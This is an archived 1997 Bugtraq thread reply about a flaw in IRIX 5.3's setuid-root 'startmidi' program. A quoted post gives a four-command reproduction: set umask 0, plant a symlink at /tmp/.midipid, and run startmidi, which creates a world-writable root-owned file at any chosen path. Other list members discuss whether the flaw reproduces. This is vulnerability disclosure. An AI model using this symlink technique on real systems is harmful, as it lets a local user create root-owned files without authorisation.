Bugtraq mailing list archives

Re: IRIX: Bug in startmidi

From: astley () DMF328 UST HK (Astley Chan)
Date: Mon, 10 Feb 1997 12:52:55 +0800

Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
noticed a little suid-root program called 'startmidi' which hides in
/usr/sbin. When run, this program creates various files in /tmp. You
guessed it, it respects umask and follows symlinks. Comme ca:

% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw-    1 root     pgrad          0 Feb  9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1


eh... that's strange.  I was looking at startmidi a while back, but didn't
find any root holes.  Now I look again, still nothing.  Indeed, on my 5.3


umm..I can successfully create file owned by root..

You must have some special configuration, I recon.  On the box I was testing


I don't think it's special to his machine, I've got the same behaviour
as described (though stopmidi can't remove the file already in /tmp).

astley

Current thread:

Re: FreeBSD,rlogin and coredumps., (continued)
- - - Re: FreeBSD,rlogin and coredumps. David Greenman (Feb 16)
    - Re: FreeBSD,rlogin and coredumps. Adrian Chadd (Feb 17)
    - Re: FreeBSD,rlogin and coredumps. Jamshid Abedi (Feb 17)
    - Re: FreeBSD,rlogin and coredumps. jamie (Feb 18)
    - Re: FreeBSD,rlogin and coredumps. Nathan Torkington (Feb 18)
    - Re: FreeBSD,rlogin and coredumps. Daniel O'Callaghan (Feb 18)
    - Re: FreeBSD,rlogin and coredumps. Simon Karpen (Feb 18)
    - Re: FreeBSD,rlogin and coredumps. Michael Lerperger (Feb 17)
    - NetBIOS Auditing Tool Oliver Friedrichs (Feb 16)
  - Re: IRIX: Bug in startmidi Yuri Volobuev (Feb 09)
    - Re: IRIX: Bug in startmidi Astley Chan (Feb 09)
    - Re: IRIX: Bug in startmidi Steve M. Acheson (Feb 10)
    - Re: IRIX: Bug in startmidi Jon Lewis (Feb 09)